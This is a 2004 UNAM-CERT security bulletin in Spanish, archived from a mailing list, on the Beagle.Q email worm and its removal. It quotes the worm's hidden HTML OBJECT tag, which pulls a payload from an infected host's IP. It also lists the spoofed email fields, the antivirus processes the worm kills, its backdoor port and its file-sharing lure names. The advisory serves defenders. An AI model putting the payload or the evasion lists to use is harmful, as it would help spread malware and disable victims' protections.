[Previo por Fecha] [Siguiente por Fecha] [Previo por Hilo] [Siguiente por Hilo]

[Hilos de Discusión] [Fecha] [Tema] [Autor]

[Linux] Nota de Seguridad UNAM-CERT 2004-04 "Propagación del Virus W32.Beagle.Q y Variantes"



-----BEGIN PGP SIGNED MESSAGE-----

   --------------------------------------------------------------------
                               UNAM-CERT

                   Departamento de Seguridad en Computo

                              DGSCA- UNAM

                  Nota de Seguridad UNAM-CERT 2004-04

	      Propagación del Virus W32.Beagle.Q y Variantes

    ----------------------------------------------------------------------

    En las últimas horas el CERT/UNAM-CERT ha recibido reportes de nuevo
    gusano que se propaga de forma masiva a través del correo
    electrónico. Este gusano conocido como Beagle.Q, explota una
    vulnerabilidad reciente en el motor de Microsoft Internet Explorer
    lo cual causa una infección sin la intervención del usuario y sin
    incluir el ejecutable del virus en el mensaje de correo electrónico.

    La vulnerabilidad explotada por Beagle.Q esta referenciada en el
    Boletín de Seguridad de *Microsoft MS03-32, Cumulative Patch for
    Internet Explorer (822925)
    <http://www.microsoft.com/technet/security/bulletin/MS03-032.mspx>*


    Fecha de Liberación: 	18 de Marzo de 2004

    Ultima Revisión: 		---

    Fuente: 			CERT/CC y diversos reportes de Equipos de
				Respuesta a Incidentes, así como Foros y
				Listas de Discusión y reportes de
				Usuarios.

    SISTEMAS AFECTADOS
    ==================

        * Windows 2000
        * Windows 95
        * Windows 98
        * Windows Me
        * Windows NT
        * Windows 2000
        * Windows XP
        * Windows Server 2003


    I. DESCRIPCIÃ?N
    ==============

    Beagle.Q conocido también como W32.Bagle.Q [Computer Associates],
    Bagle.Q [F-Secure], W32/Bagle.q@MM [McAfee], W32/Bagle.Q [Panda],
    W32/Bagle-Q [Sophos], PE_Bagle.Q [Trend], W32.Beagle.O@mm [Symantec]
    por los distintos distribuidores antivirus.

    El gusano utiliza su propio motor SMTP para enviarse por sí mismo a
    las direcciones de correo encontradas en el sistema. El gusano
    contiene su propia rutina de codificación MIME y creará el correo en
    memoria.

    El correo tiene las siguientes características:

        * *Campo From* - Puede ser uno de los siguientes:

              o management@<dominio del destinatario>
              o administration@<dominio del destinatario>
              o staff@<dominio del destinatario>
              o antivirus@<dominio del destinatario>
              o antispam@<dominio del destinatario>
              o noreply@<dominio del destinatario>
              o support@<dominio del destinatario>

        * *Campo Subject* - Puede ser uno de los siguientes:

              o Account notify
              o E-mail account disabling warning.
              o E-mail account security warning.
              o E-mail technical support message.
              o E-mail technical support warning.
              o E-mail warning
              o Email account utilization warning.
              o Email report
              o Encrypted document
              o Fax Message Received
              o Forum notify
              o Hidden message
              o Important notify
              o Important notify about your e-mail account.
              o Incoming message
              o Notify about using the e-mail account.
              o Notify about your e-mail account utilization.
              o Notify from e-mail technical support.
              o Protected message
              o RE: Protected message
              o RE: Text message
              o Re: Document
              o Re: Hello
              o Re: Hi
              o Re: Incoming Fax
              o Re: Incoming Message
              o Re: Msg reply
              o Re: Thank you!
              o Re: Thanks :)
              o Re: Yahoo!
              o Request response
              o Site changes
              o Warning about your e-mail account

        * *Mensaje*

          Un correo con el virus *Beagle.Q* tendrá la siguiente
          apariencia en el cuerpo del mensaje:

	<html><body>
        <font face="System">
        <OBJECT STYLE="display:none" DATA="http://<IP address>:81/373273.php">
        </OBJECT></body></html>


          Utilizando las aplicaciones de correo electrónico vulnerable
          como por ejemplo Microsoft Outlook and Microsoft Outlook
          Express, el virus/gusano es descargado vía HTTP desde la
          dirección IP del campo DATA del mensaje HTML.

          Cabe señalar que el cuerpo del correo es un mensaje en blanco,
          pero contendrá código HTML semejante al antes mencionado, y
          descargará y ejecutará automáticamente el gusano utilizando la
          Vulnerabilidad en nternet Explorer descrita en el Boletin de
          Seguridad de Microsoft MS03-032.

          * Cumulative Patch for Internet Explorer (822925) *
          http://www.microsoft.com/technet/security/bulletin/MS03-032.mspx
          <http://www.microsoft.com/technet/security/bulletin/MS03-032.mspx>


          El código intentará descargar el gusano de sistemas infectados
          (direcciones IP).

          El gusano inicia un servidor Web en el puerto 81 TCP. Actua
          como servidor cuando recibe un requerimiento GET particular.
          El gusano envia una página Web .hta conteniendo un script en
          VBScript el cual descarga el ejecutable y ejecuta un archivo
          llamado sm.exe. El método toma ventaja de la vulnerabilidad en
          Internet Explorer anteriormente mencionada.

          El gusano no enviará mensajes a las direcciones conteniendo
          cualquiera de las siguientes cadenas:
              o @avp.
              o @foo
              o @hotmail.com
              o @iana
              o @messagelab
              o @microsoft
              o @msn
              o abuse
              o admin
              o anyone@
              o bsd
              o bugs@
              o cafee
              o certific
              o contract@
              o f-secur
              o feste
              o free-av
              o gold-certs@
              o google
              o help@
              o icrosoft
              o info@
              o kasp
              o linux
              o listserv
              o local
              o nobody@
              o noone@
              o noreply
              o ntivi
              o panda
              o pgp
              o postmaster@
              o rating@
              o root@
              o samples
              o sopho
              o spam
              o support
              o unix
              o winrar
              o winzip

    * Variantes del Gusano
    ======================

    La versión W32.Beagle.R (Beagle.S y Beagle.T) busca acceder a los
    sistemas por el puerto 81, a diferencia de su antecesesor
    W32.Beagle.Q quien lo hace a través del puerto 2556, además, la
    versión R intenta acceder o infectar a los equipos mediante la
    búsqueda por IP?s de manera aleatoria y la versión Q lo hace
    utilizando una dispersión mediante el envío de correos electrónicos
    con ciertas características como su anterior versión W32.Beagle.K.

    De igual forma la versión R busca todos los archivos ejecutables en
    el directorio c:\emails tratándolos de infectar.

    *Detalles Técnicos*

       1. Cuando se ejecuta Beagle.Q y el año del reloj del sistema es
          2006 o posterior, el gusano intentará hacer los siguiente:
             1. Elimina la llave:

                HKEY_CURRENT_USER\SOFTWARE\windirects

             2. Elimina el valor:

                "direct.exe"="%System%\direct.exe"

                de la clave del registro:

                HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run


                Si el valor esta presente, para que Beagle.Q no reinicie
                cuando se inicie Windows.
             3. Detiene su proceso.
       2. Beagle.Q se copia a sí mismo en los siguientes archivos:

              * %System%\directs.exe
              * %System%\directs.exeopen
              * %System%\directs.exeopenopen (Cualquier copia del gusano
                o un archivo .zip o .rar protedigo con contraseña que
                contiene el gusano.)
              * %System%\directs.exeopenopenopen (Un archivo .bmp
                conteniendo una imangen de la contraseña para el archivo
                .zip o .rar.

                *Nota: *%System% es una variable. El gusano localiza el
                directorio de Sistema y se copia por sí mismo a esta
                localidad. De forma predeterminada, esto es
                C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32
                (Windows NT/2000), o C:\Windows\System32 (Windows XP).

       3. Agrega el valor:

          "directs.exe"="%System%\directs.exee"

          a la llave del registro:

          HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

          para que Beagle.Q se ejecute cuando inicie Windows.

       4. Agrega la clave:

          HKEY_CURRENT_USER\SOFTWARE\windirects

       5. Finaliza los siguientes procesos, los cuales son responsables
          de actualizar las firmas de varios programas antivirus:

              * AGENTSVR.EXE
              * ANTI-TROJAN.EXE
              * ANTIVIRUS.EXE
              * ANTS.EXE
              * APIMONITOR.EXE
              * APLICA32.EXE
              * APVXDWIN.EXE
              * ATCON.EXE
              * ATGUARD.EXE
              * ATRO55EN.EXE
              * ATUPDATER.EXE
              * ATWATCH.EXE
              * AUPDATE.EXE
              * AUTODOWN.EXE
              * AUTOTRACE.EXE
              * AUTOUPDATE.EXE
              * AVCONSOL.EXE
              * AVGSERV9.EXE
              * AVLTMAIN.EXE
              * AVPUPD.EXE
              * AVSYNMGR.EXE
              * AVWUPD32.EXE
              * AVXQUAR.EXE
              * AVprotect9x.exe
              * Au.exe
              * BD_PROFESSIONAL.EXE
              * BIDEF.EXE
              * BIDSERVER.EXE
              * BIPCP.EXE
              * BIPCPEVALSETUP.EXE
              * BISP.EXE
              * BLACKD.EXE
              * BLACKICE.EXE
              * BOOTWARN.EXE
              * BORG2.EXE
              * BS120.EXE
              * CDP.EXE
              * CFGWIZ.EXE
              * CFIADMIN.EXE
              * CFIAUDIT.EXE
              * CFINET.EXE
              * CFINET32.EXE
              * CLEAN.EXE
              * CLEANER.EXE
              * CLEANER3.EXE
              * CLEANPC.EXE
              * CMGRDIAN.EXE
              * CMON016.EXE
              * CPD.EXE
              * CPF9X206.EXE
              * CPFNT206.EXE
              * CV.EXE
              * CWNB181.EXE
              * CWNTDWMO.EXE
              * D3dupdate.exe
              * DEFWATCH.EXE
              * DEPUTY.EXE
              * DPF.EXE
              * DPFSETUP.EXE
              * DRWATSON.EXE
              * DRWEBUPW.EXE
              * ENT.EXE
              * ESCANH95.EXE
              * ESCANHNT.EXE
              * ESCANV95.EXE
              * EXANTIVIRUS-CNET.EXE
              * FAST.EXE
              * FIREWALL.EXE
              * FLOWPROTECTOR.EXE
              * FP-WIN_TRIAL.EXE
              * FRW.EXE
              * FSAV.EXE
              * FSAV530STBYB.EXE
              * FSAV530WTBYB.EXE
              * FSAV95.EXE
              * GBMENU.EXE
              * GBPOLL.EXE
              * GUARD.EXE
              * GUARDDOG.EXE
              * HACKTRACERSETUP.EXE
              * HTLOG.EXE
              * HWPE.EXE
              * IAMAPP.EXE
              * IAMSERV.EXE
              * ICLOAD95.EXE
              * ICLOADNT.EXE
              * ICMON.EXE
              * ICSSUPPNT.EXE
              * ICSUPP95.EXE
              * ICSUPPNT.EXE
              * IFW2000.EXE
              * IPARMOR.EXE
              * IRIS.EXE
              * JAMMER.EXE
              * KAVLITE40ENG.EXE
              * KAVPERS40ENG.EXE
              * KERIO-PF-213-EN-WIN.EXE
              * KERIO-WRL-421-EN-WIN.EXE
              * KERIO-WRP-421-EN-WIN.EXE
              * KILLPROCESSSETUP161.EXE
              * LDPRO.EXE
              * LOCALNET.EXE
              * LOCKDOWN.EXE
              * LOCKDOWN2000.EXE
              * LSETUP.EXE
              * LUALL.EXE
              * LUCOMSERVER.EXE
              * LUINIT.EXE
              * MCAGENT.EXE
              * MCUPDATE.EXE
              * MFW2EN.EXE
              * MFWENG3.02D30.EXE
              * MGUI.EXE
              * MINILOG.EXE
              * MOOLIVE.EXE
              * MRFLUX.EXE
              * MSCONFIG.EXE
              * MSINFO32.EXE
              * MSSMMC32.EXE
              * MU0311AD.EXE
              * NAV80TRY.EXE
              * NAVAPW32.EXE
              * NAVDX.EXE
              * NAVSTUB.EXE
              * NAVW32.EXE
              * NC2000.EXE
              * NCINST4.EXE
              * NDD32.EXE
              * NEOMONITOR.EXE
              * NETARMOR.EXE
              * NETINFO.EXE
              * NETMON.EXE
              * NETSCANPRO.EXE
              * NETSPYHUNTER-1.2.EXE
              * NETSTAT.EXE
              * NISSERV.EXE
              * NISUM.EXE
              * NMAIN.EXE
              * NORTON_INTERNET_SECU_3.0_407.EXE
              * NPF40_TW_98_NT_ME_2K.EXE
              * NPFMESSENGER.EXE
              * NPROTECT.EXE
              * NSCHED32.EXE
              * NTVDM.EXE
              * NUPGRADE.EXE
              * NVARCH16.EXE
              * NWINST4.EXE
              * NWTOOL16.EXE
              * OSTRONET.EXE
              * OUTPOST.EXE
              * OUTPOSTINSTALL.EXE
              * OUTPOSTPROINSTALL.EXE
              * PADMIN.EXE
              * PANIXK.EXE
              * PAVPROXY.EXE
              * PCC2002S902.EXE
              * PCC2K_76_1436.EXE
              * PCCIOMON.EXE
              * PCDSETUP.EXE
              * PCFWALLICON.EXE
              * PCIP10117_0.EXE
              * PDSETUP.EXE
              * PERISCOPE.EXE
              * PERSFW.EXE
              * PF2.EXE
              * PFWADMIN.EXE
              * PINGSCAN.EXE
              * PLATIN.EXE
              * POPROXY.EXE
              * POPSCAN.EXE
              * PORTDETECTIVE.EXE
              * PPINUPDT.EXE
              * PPTBC.EXE
              * PPVSTOP.EXE
              * PROCEXPLORERV1.0.EXE
              * PROPORT.EXE
              * PROTECTX.EXE
              * PSPF.EXE
              * PURGE.EXE
              * PVIEW95.EXE
              * QCONSOLE.EXE
              * QSERVER.EXE
              * RAV8WIN32ENG.EXE
              * REGEDIT.EXE
              * REGEDT32.EXE
              * RESCUE.EXE
              * RESCUE32.EXE
              * RRGUARD.EXE
              * RSHELL.EXE
              * RTVSCN95.EXE
              * RULAUNCH.EXE
              * SAFEWEB.EXE
              * SBSERV.EXE
              * SD.EXE
              * SETUPVAMEEVAL.EXE
              * SETUP_FLOWPROTECTOR_US.EXE
              * SFC.EXE
              * SGSSFW32.EXE
              * SH.EXE
              * SHELLSPYINSTALL.EXE
              * SHN.EXE
              * SMC.EXE
              * SOFI.EXE
              * SPF.EXE
              * SPHINX.EXE
              * SPYXX.EXE
              * SS3EDIT.EXE
              * ST2.EXE
              * SUPFTRL.EXE
              * SUPPORTER5.EXE
              * SYMPROXYSVC.EXE
              * SYSEDIT.EXE
              * TASKMON.EXE
              * TAUMON.EXE
              * TAUSCAN.EXE
              * TC.EXE
              * TCA.EXE
              * TCM.EXE
              * TDS-3.EXE
              * TDS2-98.EXE
              * TDS2-NT.EXE
              * TFAK5.EXE
              * TGBOB.EXE
              * TITANIN.EXE
              * TITANINXP.EXE
              * TRACERT.EXE
              * TRJSCAN.EXE
              * TRJSETUP.EXE
              * TROJANTRAP3.EXE
              * UNDOBOOT.EXE
              * UPDATE.EXE
              * VBCMSERV.EXE
              * VBCONS.EXE
              * VBUST.EXE
              * VBWIN9X.EXE
              * VBWINNTW.EXE
              * VCSETUP.EXE
              * VFSETUP.EXE
              * VIRUSMDPERSONALFIREWALL.EXE
              * VNLAN300.EXE
              * VNPC3000.EXE
              * VPC42.EXE
              * VPFW30S.EXE
              * VPTRAY.EXE
              * VSCENU6.02D30.EXE
              * VSECOMR.EXE
              * VSHWIN32.EXE
              * VSISETUP.EXE
              * VSMAIN.EXE
              * VSMON.EXE
              * VSSTAT.EXE
              * VSWIN9XE.EXE
              * VSWINNTSE.EXE
              * VSWINPERSE.EXE
              * W32DSM89.EXE
              * W9X.EXE
              * WATCHDOG.EXE
              * WEBSCANX.EXE
              * WGFE95.EXE
              * WHOSWATCHINGME.EXE
              * WINRECON.EXE
              * WNT.EXE
              * WRADMIN.EXE
              * WRCTRL.EXE
              * WSBGATE.EXE
              * WYVERNWORKSFIREWALL.EXE
              * XPF202EN.EXE
              * ZAPRO.EXE
              * ZAPSETUP3001.EXE
              * ZATUTOR.EXE
              * ZAUINST.EXE
              * ZONALM2601.EXE
              * ZONEALARM.EXE

       6. Borra los siguientes valores

              * 9XHtProtect
              * Antivirus
              * HtProtect
              * ICQ Net
              * ICQNet
              * My AV
              * NetDy
              * Special Firewall Service
              * Tiny AV
              * Zone Labs Client Ex
              * service


          De las claves del registro:

              * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

              * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run



       7. Abre una puerta trasera en el puerto 2556 TCP.

          Si un intruso envía un mensaje de datos formateado
          especialmente al puerto, el gusano permitirá que un archivo
          arbitrario sea descargado en el directorio %windir%. Este
          archivo será guardado como %Windir%\iuplda<x>.exe, donde <x>
          es una cadena aleatoria de caracteres.

       8. Intenta propagarse a través de redes de compartición de
          archivos, como Kazaa e iMesh, W32.Beagle.K se copia a sí mismo
          a los directorios que contienen la cadena "shar" en sus
          nombres. El gusano utiliza los nombres de archivos de la
          siguiente lista:
              * ACDSee 9.exe
              * Adobe Photoshop 9 full.exe
              * Ahead Nero 7.exe
              * Matrix 3 Revolution English Subtitles.exe
              * Microsoft Office 2003 Crack, Working!.exe
              * Microsoft Office XP working Crack, Keygen.exe
              * Microsoft Windows XP, WinXP Crack, working Keygen.exe
              * Opera 8 New!.exe
              * Porno Screensaver.scr
              * Porno pics arhive, xxx.exe
              * Porno, sex, oral, anal cool, awesome!!.exe
              * Serials.txt.exe
              * WinAmp 5 Pro Keygen Crack Update.exe
              * WinAmp 6 New!.exe
              * Windown Longhorn Beta Leak.exe
              * Windows Sourcecode update.doc.exe
              * XXX hardcore images.exe

       9. Busca en las unidades locales e intenta infectar archivos
          .exe. La rutina de infección es polimórfica e agrega el gusano
          al archivo.

      10. Escanea los archivos en las unidades locales con las
          siguientes extensiones:
              * .adb
              * .asp
              * .cfg
              * .cgi
              * .dbx
              * .dhtm
              * .eml
              * .htm
              * .jsp
              * .mbx
              * .mdx
              * .mht
              * .mmf
              * .msg
              * .nch
              * .ods
              * .oft
              * .php
              * .pl
              * .sht
              * .shtm
              * .stm
              * .tbb
              * .txt
              * .uin
              * .wab
              * .wsh
              * .xls
              * .xml

                y colecciona cualquier dirección de correo electrónico
                que encuentra.



    III. SOLUCIÃ?N
    =============

        * Aplicar una Actualización del Distribuidor

          Se recomienda instalar la actualización de seguridad que
          soluciona la vulnerabilidad que explota este gusano.

          * Microsoft Security Bulletin MS03-032
          Cumulative Patch for Internet Explorer (822925) *
          http://www.microsoft.com/technet/security/bulletin/MS03-032.mspx
          <http://www.microsoft.com/technet/security/bulletin/MS03-032.mspx>


          Pero es recomendable aplicar la última actualización
          acumulativa para Internet Explorer liberada el 2 de Febrero de
          2004:

          * Microsoft Security Bulletin MS04-004
          Cumulative Security Update for Internet Explorer (832894)*
          http://www.microsoft.com/technet/security/bulletin/MS04-004.mspx
          <http://www.microsoft.com/technet/security/bulletin/MS04-004.mspx>



        * Ejecutar, administrar y actualizar un software antivirus

          Aunque un paquete de software antivirus actualizado no puede
          brindar protección contra todos los códigos maliciosos, para
          la mayoría de los usuarios representa la primera línea de
          defensa contra ataques de código malicioso.

          La mayoría de los distribuidores antivirus liberan
          frecuentemente información actualizada, herramientas, o bases
          de datos de virus para ayudar a detectar y recuperar un
          sistema que ha sido infectado mediante un código malicioso,
          incluyendo Beagle.K. De esta forma, es importante que los
          usuarios mantengan su software antivirus actualizado.

          Mucho software antivirus se apoya en las actualizaciones
          automáticas de las definiciones de virus. El CERT/UNAM-CERT
          recomienda utilizar estas actualizaciones automáticas cuando
          estén disponibles.

        * No ejecutar programas de origen desconocido

          Nunca descargue, instale o ejecute un programa a menos que
          sepa que es autorizado por una persona o compañía en la que se
          confía. Los usuarios de correo electrónico deben estar
          concientes de archivos adjuntos inesperados, mientras que los
          usuarios de Internet Relay Chat (IRC), de la mensajería
          instantánea (IM), y de servicios de compartición de archivos
          deben ser muy cuidadosos al dar clic en vínculos o links
          desconocidos o al ejecutar software enviado por otros usuarios
          debido a que son los métodos más utilizados entre los intrusos
          para intentar crear redes de agentes DDoS.

        * Eliminación Manual

              o Deshabilitar System Restore (Windows Me/XP).

                    + Windows Me
                         1. Haga clic en Inicio, seleccione
                            Configuración y, a continuación, haga clic
                            en Panel de control.
                         2. Haga doble clic en Sistema. Se abrirá la
                            ventana de Propiedades del sistema.
                            *Nota:* Si no es visible el ícono de Sistema
                            haga clic en "Ver todas las opciones de
                            Panel de control".
                         3. Haga clic en la pestaña Rendimiento y haga
                            clic en el botón "Archivos de sistema". La
                            ventana de Archivos de sistema se abrirá.
                         4. Haga clic en Sistema de archivos y, a
                            continuación, haga clic en la pestaña
                            Solución de problemas.
                         5. Marque la casílla de la opción Deshabilitar
                            Restaurar sistema.
                         6. Haga clic en Aceptar y, por último, en
                            Cerrar. Haga clic en Sí cuando se le
                            pregunte si desea reiniciar Windows.

                    + Windows XP
                         1. Haga clic en Inicio.
                         2. Haga clic con el botón secundario en el
                            icono Mi PC y, a continuación, haga clic en
                            Propiedades.
                         3. Haga clic en la pestaña Restaurar sistema.
                         4. Marque la casílla Desactivar Restaurar
                            sistema o la casílla Desactivar Restaurar
                            sistema en todas las unidades.
                         5. Haga clic en Aplicar y a continuación, en
                            Aceptar.
                         6. Como verá en el mensaje, esta acción
                            eliminará todos los puntos de restauración
                            existentes. Haga clic en Sí para llevar a
                            cabo esta acción.
                         7. Haga clic en Aceptar y reinice el sistema.


              o Actualizar las definiciones de Antivirus.

                Independientemente del software antivirus que este
                utilizando, actualice su base de datos de firmas
                antivirus para poder eliminar el virus Beagle.K.

              o Eliminar los valores que fueron agregados al registro y
                reiniciar el equipo.

                   1. Dar clic en Inicio y después en Ejecuta.
                   2. Escribir regedit y presionar Aceptar.
                   3. Buscar la siguiente llave:

                          HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run


                   4. En el panel de la derecha eliminar el siguiente
                      valor:

                          "directs.exe"="%System%\directs.exe"

                   5. Salir del editor del registro.
                   6. Localizar y eliminar los archivos ejecutables
                      directs.exe, directs.exeopen, directs.exeopenopen
                      o directs.exeopenopenopen del directorio (en el
                      caso de que existan):

                          + C:\Windows\System (Win 95/98/ME)
                          + C:\Winnt\System32 (Win NT/2000)
                          + C:\Windows\System32 (Win XP)

                   7. Reiniciar el equipo.


              o Analizar el sistema mediante el software antivirus
                actualizado para eliminar los archivos infectados.




    APÃ?NDICE A. Referencias
    =======================

        * Virus y Gusanos UNAM-CERT -
          http://www.unam-cert.unam.mx/gusanos/index.html

        * Symantec -
          http://securityresponse.symantec.com/avcenter/venc/data/w32 beagle o en mm html

        * Trend Micro -
          http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=PE_BAGLE.Q

        * Panda Software -
          http://www.pandasoftware.com/virus_info/encyclopedia/overview.aspx?IdVirus=45705&sind=0

        * Sophos http://www.sophos.com/virusinfo/analyses/w32bagleq.html

        * Computer Associates -
          http://www3.ca.com/threatinfo/virusinfo/virus.aspx?id=38599


    ------------------------------------------------------------------------
    El *Departamento de Seguridad en Cómputo/UNAM-CERT* agradece el
    apoyo en la elaboración, revisión y traducción de éste boletín a:

        * Jesus Ramón Jiménez Rojas (jrojas en seguridad unam mx)
        * Omar Landa Alfán (olanda en correo seguridad unam mx)
        * Sergio Alavez (salavez en seguridad unam mx)
        * Mauricio Andrade (mandrade en seguridad unam mx)

    ------------------------------------------------------------------------


    INFORMACIÃ?N
    ===========

     Este documento se encuentra disponible en:

        http://www.seguridad.unam.mx

        http://www.unam-cert.unam.mx/Notas/Notas2004/nota-UNAM-CERT-2004-004.html


    Para mayor información acerca de éste boletín de seguridad contactar a:


                               UNAM CERT
                  Equipo de Respuesta a Incidentes UNAM
                   Departamento de Seguridad en Computo
                               DGSCA - UNAM
                     E-Mail : unam-cert en seguridad unam mx
                        http://www.unam-cert.unam.mx
                        http://www.seguridad.unam.mx
                        ftp://ftp.seguridad.unam.mx
        		    Tel : 56 22 81 69
             		    Fax : 56 22 80 43



- --
Juan Carlos Guel Lopez
UNAM-CERT
Equipo de Respuesta a Incidentes UNAM
DGSCA, UNAM                     E-mail: unam-cert en seguridad unam mx
Circuito Exterior, C. U.        Tel.: 5622-81-69  Fax: 5622-80-43
Del. Coyoacan                   WWW: http://www.seguridad.unam.mx
04510 Mexico D. F.              WWW: http://www.unam-cert.unam.mx

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8

iQEVAwUBQFoUHnAvLUtwgRsVAQEPqgf/QAsUZJLmXlOKfS0I6lOONV+hWp11Ozw7
GO5BJbwbWMT/e3vkAybvaeZYUxft9lxugpZWzcs6gDlmtUceJqTbiGZ9Xvddg6yu
BYa4lJKUKlz1A5SrZgwDzixbePOU7YN2B3/qAKkJ0kbol2FqOkHrwQ3Nt9R89rUy
QRkZah/7UI1gduT2B7O1NYqRIeXhWvF8WVh74SpL3Ny6U8gKH/fDtYV8PIGxKT+x
i/2FUAhFL/r9TbYa+And5ZQGGppY/D+nFr729319PcyamO1N73dsoMPwAk4t7u8i
8blYZVBytyvyCWj9nNuBAbL7gXmEYsRTqKN55uWjWDoNK2M1SUF0AA==
=oCCx
-----END PGP SIGNATURE-----



Lista de correo linux en opensource org mx
Preguntas linux-owner en opensource org mx
http://www.opensource.org.mx/



[Hilos de Discusión] [Fecha] [Tema] [Autor]